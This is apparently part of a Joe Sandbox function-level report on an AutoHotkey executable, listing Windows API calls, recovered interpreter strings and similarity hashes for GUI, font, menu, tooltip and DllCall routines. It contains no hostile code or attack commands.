                                      APIs
                                      • _memset.LIBCMT ref: 0047163F
                                      • GetStockObject.GDI32(00000011), ref: 00471649
                                      • GetDC.USER32(00000000), ref: 0047166A
                                      • SelectObject.GDI32(00000000,?), ref: 00471692
                                      • GetTextFaceW.GDI32(00000000,0000003F,-004DA644), ref: 004716AB
                                      • GetTextMetricsW.GDI32(00000000,?), ref: 004716BA
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004716D5
                                      • MulDiv.KERNEL32(?,00000048,00000000), ref: 004716ED
                                      • SelectObject.GDI32(00000000,00000000), ref: 0047173B
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00471740
                                      • _wcsncpy.LIBCMT ref: 004717AE
                                      • __wcsnicmp.LIBCMT ref: 00471822
                                      • GetDC.USER32(00000000), ref: 004719E6
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004719F1
                                      • _wcsncpy.LIBCMT ref: 00471A18
                                      • EnumFontFamiliesExW.GDI32(00000000,?,00481380,?,00000000,00000000,00000000,00000000), ref: 00471A42
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00471A72
                                      • MulDiv.KERNEL32(?,00000000,00000048), ref: 00471B01
                                      • CreateFontW.GDI32(00000000), ref: 00471B0A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Object$CapsDeviceFontReleaseSelectText_wcsncpy$CreateEnumFaceFamiliesMetricsStock__wcsnicmp_memset
                                      • String ID: Can't create font.$Too many fonts.$bold$italic$norm$strike$underline
                                      • API String ID: 1062558797-336657898
                                      • Opcode ID: 9cb05b44418e01063ba8d39eae54e3db2149855d72524ecb9d39af64839cb0c1
                                      • Instruction ID: 3974631e3c14450c0bc07f176beca0b664881a305c6b9d82be918dd1a62c3582
                                      • Opcode Fuzzy Hash: 9cb05b44418e01063ba8d39eae54e3db2149855d72524ecb9d39af64839cb0c1
                                      • Instruction Fuzzy Hash: 29D116B1A083409BE3349B34DC46BEB77E4EB95714F04892EE68D872D1E7B89409C75B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Checked$Choice$CurrentCol$CurrentLine$Enabled$ExStyle$FindString$Hwnd$Line$LineCount$List$Selected$Style$Tab$Visible
                                      • API String ID: 3832890014-586525042
                                      • Opcode ID: 6e95d8e3919229d431c6193dcbf8ed0618aa7b6650a646b41026138ca5863f24
                                      • Instruction ID: 19224e3fbce9f318ada42a70bc9d29129aebdf4092152744b19d80f3b135b2c4
                                      • Opcode Fuzzy Hash: 6e95d8e3919229d431c6193dcbf8ed0618aa7b6650a646b41026138ca5863f24
                                      • Instruction Fuzzy Hash: 25316969A81A1122EF15212E4E53BDF24895B21B0BFC4487BFC14D43C1F78EEA55D1AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcsnicmp_wcsncpy
                                      • String ID: Add$Delete$DeleteCol$Function name too long.$GetCount$GetNext$GetText$Insert$InsertCol$LV_$Modify$ModifyCol$SetImageList
                                      • API String ID: 3240457921-3049600462
                                      • Opcode ID: e9334eb82869fbbf4a6ff3359bd9831252c41840863a3eb8633945da137164f8
                                      • Instruction ID: 39cb9a3fd403fc370eef6fca9333c88eac97b048f511fd6fd33b024af1fbf178
                                      • Opcode Fuzzy Hash: e9334eb82869fbbf4a6ff3359bd9831252c41840863a3eb8633945da137164f8
                                      • Instruction Fuzzy Hash: E461D372A043125BCB10DE559881AAB73D4EF94309F544D3FEC08A7241EB79EE09C7DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcstoi64wcstoxq
                                      • String ID: Bass$BassBoost$Equalizer$Loudness$Mono$Mute$OnOff$Pan$QSoundPan$StereoEnh$Treble$Vol$Volume
                                      • API String ID: 1236819900-1456001458
                                      • Opcode ID: 4de2b772e860efe6bfa0e5e01ff30c470bc476e505a6ef8bcd5998adcf571d97
                                      • Instruction ID: 7a841154874060bda45ad242b3a0e3ab406a6aca7e27b374eed37d88fdefb1dc
                                      • Opcode Fuzzy Hash: 4de2b772e860efe6bfa0e5e01ff30c470bc476e505a6ef8bcd5998adcf571d97
                                      • Instruction Fuzzy Hash: 3E310CA5E4161032DF16212A2D03BCE64454B71B4BFC8847AFC0895381F78EDAA991FF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageW.USER32(?,00001101,00000000,00000000), ref: 0045960E
                                      • __wcsicoll.LIBCMT ref: 0045974E
                                      • __wcsnicmp.LIBCMT ref: 00459779
                                      • __wcsicoll.LIBCMT ref: 0045978E
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004599F4
                                      • SendMessageW.USER32(00000000,0000113F,00000000,00000008), ref: 00459A50
                                      • SendMessageW.USER32(00000000,00001114,00000000,?), ref: 00459A83
                                      • SendMessageW.USER32(00000000,0000110B,00000005,?), ref: 00459A9F
                                      • SendMessageW.USER32(?,0000110B,?,?), ref: 00459ABB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$__wcsicoll$__wcsnicmp
                                      • String ID: "$Bold$Check$Expand$First$Icon$Select$Sort$Vis
                                      • API String ID: 2665471568-3379154359
                                      • Opcode ID: aefc862266892fa3553a4b9676a82e3c416c81966e14b5f42d9e64b0f223fdcd
                                      • Instruction ID: 177f2d6e0b9f6bcdb33ea9b9a590cea1e37f561e74b2ad1f0db3a3b274f33301
                                      • Opcode Fuzzy Hash: aefc862266892fa3553a4b9676a82e3c416c81966e14b5f42d9e64b0f223fdcd
                                      • Instruction Fuzzy Hash: 40F17FB1A04341EBD7209F25C84176BB7E4AF95306F14896EFC8997382E378DD48CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign$__wcsicoll__wcsnicmp
                                      • String ID: Joy$JoyAxes$JoyButtons$JoyInfo$JoyName$JoyPOV$JoyR$JoyU$JoyV$JoyX$JoyY$JoyZ
                                      • API String ID: 3933591233-249873715
                                      • Opcode ID: 324fb9d4e3fc3b38459b0ab995a2c816fef32ee7648b51ad36eb58285b925485
                                      • Instruction ID: 88364c352382a1842044c7ac81f3648935400cc86ed10014846f1794616480b6
                                      • Opcode Fuzzy Hash: 324fb9d4e3fc3b38459b0ab995a2c816fef32ee7648b51ad36eb58285b925485
                                      • Instruction Fuzzy Hash: 2741656260061022EE21252E7D82BEF5689CF61717F15447BFC44E9383F78DDD8A90EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: +-^$Off$Parameter #1 invalid.
                                      • API String ID: 3832890014-3419364491
                                      • Opcode ID: a59713dcf4e9b9ed5e5df409c0f5cd1a5386660aa5f1d5158408fda7fbb28d9f
                                      • Instruction ID: 2ad6502e5a490b1c9097729e5c89c7b9b97553846f446f54bf96822bc900ae32
                                      • Opcode Fuzzy Hash: a59713dcf4e9b9ed5e5df409c0f5cd1a5386660aa5f1d5158408fda7fbb28d9f
                                      • Instruction Fuzzy Hash: 01C15A316443105BE720AF24AD44BBF7BA4DB86725F50063BFD51A62C1CBBC9D09C7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Add$Delete$Function name too long.$Get$GetChild$GetCount$GetNext$GetParent$GetPrev$GetSelection$GetText$Modify$SetImageList
                                      • API String ID: 3832890014-4116235998
                                      • Opcode ID: 182f494c8bd9b5c5ebf5ebfb06b443153f524f0c481fdf48a02403c2e3c90cd0
                                      • Instruction ID: 89202ee7d12e203e829cc0bfd51c06d45cd8840db19b3387679bcdaadd2cd49d
                                      • Opcode Fuzzy Hash: 182f494c8bd9b5c5ebf5ebfb06b443153f524f0c481fdf48a02403c2e3c90cd0
                                      • Instruction Fuzzy Hash: 8241ED72A043125ACB00E6659D42BAF33D89E5474AF54493FFD08A3241F76DEE08C7AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSystemMetrics.USER32(00000007), ref: 0045C589
                                      • GetSystemMetrics.USER32(00000007), ref: 0045C597
                                      • GetSystemMetrics.USER32(00000004), ref: 0045C59F
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0045C5B0
                                      • IsWindow.USER32(00000000), ref: 0045C5EA
                                      • DestroyWindow.USER32(00000000,?,?,?,00000000), ref: 0045C5FA
                                      • CreateWindowExW.USER32(00000008,AutoHotkey2,?,88C00000,?,?,00000000,?,0002044A,00000000,00400000,00000000), ref: 0045C63A
                                      • GetClientRect.USER32(00000000,?), ref: 0045C647
                                      • CreateWindowExW.USER32(00000000,static,?,50000001,00000000,00000000,?,?,00000000,00000000,00400000,00000000), ref: 0045C688
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0045C6A4
                                      • _wcsncpy.LIBCMT ref: 0045C6C2
                                      • EnumFontFamiliesExW.GDI32(00000000,?,00481380,?,00000000,?,?,00000000), ref: 0045C6E9
                                      • GetStockObject.GDI32(00000011), ref: 0045C71B
                                      • SelectObject.GDI32(00000000,00000000), ref: 0045C723
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 0045C734
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045C73D
                                      • DeleteDC.GDI32(00000000), ref: 0045C746
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045C784
                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 0045C795
                                      • ShowWindow.USER32(00000000,00000004,?,?,?,00000000), ref: 0045C7A4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$CreateSystem$Metrics$FontObject$CapsClientDeleteDestroyDeviceEnumFaceFamiliesInfoMessageParametersRectSelectSendShowStockText_wcsncpy
                                      • String ID: AutoHotkey2$DISPLAY$Segoe UI$static
                                      • API String ID: 2836835088-4085670783
                                      • Opcode ID: 431dd126622e5b417c8c728b7b198fdbccf32c373813646f6aef35dee31cb68b
                                      • Instruction ID: 76b2cf4883b07112d259e3fb83bb736c3c1e64ff025fd089b87f00de07ebcc0a
                                      • Opcode Fuzzy Hash: 431dd126622e5b417c8c728b7b198fdbccf32c373813646f6aef35dee31cb68b
                                      • Instruction Fuzzy Hash: 1F61B871654300BFE314DF64DC8AFAB7BE8EB89704F044529FA09E72D1D6B4A805CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Alnum$Alpha$Date$Digit$Float$Integer$Lower$Number$Space$Time$Upper$Xdigit
                                      • API String ID: 3832890014-3813714638
                                      • Opcode ID: a0d02113a8eb6ae61e9ef839cc1767f4e3974e9db0c3cfa1f2aa6923a9968183
                                      • Instruction ID: c9fe76e2a0921c31be59344f814932a5690db55d9624fbd926a3e453ee902e46
                                      • Opcode Fuzzy Hash: a0d02113a8eb6ae61e9ef839cc1767f4e3974e9db0c3cfa1f2aa6923a9968183
                                      • Instruction Fuzzy Hash: 412179A9E4161122DF25312E5E03BDF24885F61B4BF84447BFC14D1282F78EDA45D0BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcsicmp_l
                                      • String ID: LEFT$MIDDLE$RIGHT$WheelDown$WheelLeft$WheelRight$WheelUp
                                      • API String ID: 3172861507-1318937625
                                      • Opcode ID: 14026f6f51614b6e49c8c7e65718f2fe53052d8c8a1b5c921e7ae00cb6230ab8
                                      • Instruction ID: 403551d3aff604dd2b5aa9bc299c1c3f404ed81b416b63eb7d810ecb64373364
                                      • Opcode Fuzzy Hash: 14026f6f51614b6e49c8c7e65718f2fe53052d8c8a1b5c921e7ae00cb6230ab8
                                      • Instruction Fuzzy Hash: EF31C859A8161131EF25223A5E07BDF28C80FA1747F58443FB814E0282FA8EDA95C0BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __fassign.LIBCMT ref: 0043D262
                                        • Part of subcall function 0049BF9D: wcstoxl.LIBCMT ref: 0049BFAD
                                      • IsWindow.USER32(004B0CF8), ref: 0043D2A5
                                      • DestroyWindow.USER32(004B0CF8), ref: 0043D2B0
                                      • GetCursorPos.USER32 ref: 0043D304
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 0043D37A
                                      • GetMonitorInfoW.USER32 ref: 0043D394
                                      • _memset.LIBCMT ref: 0043D3DC
                                      • IsWindow.USER32(004B0CF8), ref: 0043D40A
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0043D447
                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 0043D467
                                      • SendMessageW.USER32(00000000,0000041F,00000000,?), ref: 0043D492
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0043D4B2
                                      • SendMessageW.USER32(00000000,00000412,00000000,?), ref: 0043D4D1
                                      • SendMessageW.USER32(00000000,00000439,00000000,?), ref: 0043D502
                                      • GetWindowRect.USER32(00000000,?), ref: 0043D51C
                                      • SendMessageW.USER32(00000000,00000412,00000000,?), ref: 0043D5B6
                                      • SendMessageW.USER32(00000000,00000411,00000001,?), ref: 0043D5C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$Monitor$CreateCursorDestroyFromInfoPointRect__fassign_memsetwcstoxl
                                      • String ID: $($,$Max window number is 20.$tooltips_class32
                                      • API String ID: 3638321345-788377568
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsicoll$_wcsncpy
                                      • String ID: *pP$AStr$Char$Double$Float$Int$Int64$Ptr$Short$Str$WStr
                                      • API String ID: 1630244902-313837492
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __wcsnicmp.LIBCMT ref: 004587FA
                                      • __wcsnicmp.LIBCMT ref: 00458844
                                      • __wcsnicmp.LIBCMT ref: 00458891
                                      • __wcsnicmp.LIBCMT ref: 00458923
                                      • __wcsnicmp.LIBCMT ref: 004588F0
                                        • Part of subcall function 004142C0: __fassign.LIBCMT ref: 004142D0
                                      • __wcsicoll.LIBCMT ref: 00458952
                                      • SendMessageW.USER32(00000001,00001004,00000000,00000000), ref: 004589B7
                                      Strings
                                      Similarity
                                      • API ID: __wcsnicmp$MessageSend__fassign__wcsicoll
                                      • String ID: A$Check$Col$Focus$I$Icon$M$Select$Vis
                                      • API String ID: 1367502766-1624853574
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Bind$Call$IsBuiltIn$IsByRef$IsOptional$IsVariadic$MaxParams$MinParams$Name$Out of memory.
                                      • API String ID: 3832890014-142481380
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsnicmp_wcsncpy$Window__wcsicoll__wcstoi64__wcstoui64wcstoxq
                                      • String ID: ahk_$class$exe$group$pid
                                      • API String ID: 3421470534-2955265324
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00468112
                                      • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0046813A
                                      • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00468160
                                      • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00468188
                                      • GetWindowRect.USER32(?,?), ref: 004681A9
                                      • GetParent.USER32(?), ref: 004681C8
                                      • ScreenToClient.USER32(00000000), ref: 004681CF
                                      • MoveWindow.USER32(80000000,?,?,?,80000000,00000001,?,?), ref: 0046822C
                                      • SendMessageW.USER32(?,00000421,00000001,00000000), ref: 00468254
                                      • SendMessageW.USER32(00000000,00000421,00000000,00000000), ref: 00468265
                                      • SendMessageW.USER32(?,00000420,00000001,00000000), ref: 0046827B
                                      • InvalidateRect.USER32(00000000,00000000,00000001,?,00000420,00000001,00000000,?,00000421,00000001,00000000,?,?), ref: 00468282
                                      • SendMessageW.USER32(?,00000420,00000000,?), ref: 0046829C
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000420,00000000,?,?,00000421,00000001,00000000,?,?), ref: 004682A3
                                      • GetPropW.USER32(?,ahk_autosize), ref: 004682D4
                                      • SetPropW.USER32(?,ahk_autosize,00000000), ref: 004682EE
                                      • RemovePropW.USER32(00000000,ahk_autosize), ref: 004682FF
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$PropRect$InvalidateWindow$ClientMoveParentRemoveScreen
                                      • String ID: ahk_autosize
                                      • API String ID: 1794348199-1503521729
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(user32,?,?,?,000000EC), ref: 004515B7
                                      • GetModuleHandleW.KERNEL32(kernel32,?,000000EC), ref: 004515C3
                                      • GetModuleHandleW.KERNEL32(comctl32,?,000000EC), ref: 004515CF
                                      • GetModuleHandleW.KERNEL32(gdi32,?,000000EC), ref: 004515DB
                                      • _wcsncpy.LIBCMT ref: 004515F7
                                      • _wcsrchr.LIBCMT ref: 00451613
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,000000EC), ref: 00451640
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00451660
                                      • GetProcAddress.KERNEL32(?,?), ref: 004516AF
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,-00000002,000000FF,?,00000104,00000000,00000000,?,?,?,?,000000EC), ref: 004516DD
                                      • GetModuleHandleW.KERNEL32(?,?,?,?,?,000000EC), ref: 004516EB
                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,000000EC), ref: 00451706
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0045173F
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00451768
                                      Strings
                                      Similarity
                                      • API ID: HandleModule$AddressProc$ByteCharMultiWide$LibraryLoad_wcsncpy_wcsrchr
                                      • String ID: DllCall$comctl32$gdi32$kernel32$user32
                                      • API String ID: 1361463379-1793033601
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: AddRef$BindMethod$Clone$Function name too long.$GetBase$NewEnum$RawGet$RawSet$Release$SetBase
                                      • API String ID: 3832890014-3709995375
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • AppendMenuW.USER32(00000000,00000000,0000FF14,&Open), ref: 0047723C
                                      • SetMenuDefaultItem.USER32(00000000,0000FF14,00000000,?,?,?,?,?,?,?,?,?,?,?,00477448), ref: 00477257
                                      • AppendMenuW.USER32(00000000,00000000,0000FF15,&Help), ref: 00477276
                                      • AppendMenuW.USER32(00000000,00000800,0000FF1C,00000000), ref: 00477288
                                      • AppendMenuW.USER32(00000000,00000000,0000FF16,&Window Spy), ref: 0047729A
                                      • AppendMenuW.USER32(00000000,00000000,0000FF17,&Reload This Script), ref: 004772AC
                                      • AppendMenuW.USER32(00000000,00000000,0000FF18,&Edit This Script), ref: 004772BE
                                      • AppendMenuW.USER32(00000000,00000800,0000FF1D,00000000), ref: 004772D0
                                      • AppendMenuW.USER32(00000000,00000000,0000FF19,&Suspend Hotkeys), ref: 004772E2
                                      • AppendMenuW.USER32(00000000,00000000,0000FF1A,&Pause Script), ref: 004772F4
                                      • AppendMenuW.USER32(00000000,00000000,0000FF1B,E&xit), ref: 00477306
                                      Strings
                                      Similarity
                                      • API ID: Menu$Append$DefaultItem
                                      • String ID: &Edit This Script$&Help$&Open$&Pause Script$&Reload This Script$&Suspend Hotkeys$&Window Spy$E&xit
                                      • API String ID: 1113060144-2163008055
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNEL32(00000000,00002000,0040E820,00000000,00000000,004D860C), ref: 0040E54A
                                      • SetThreadPriority.KERNEL32(00000000,0000000F,?,00408D82,00000000,004089D8,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000000,0040635D,?), ref: 0040E560
                                      • PostThreadMessageW.USER32(00000000,00000417,0040635D,00000000), ref: 0040E584
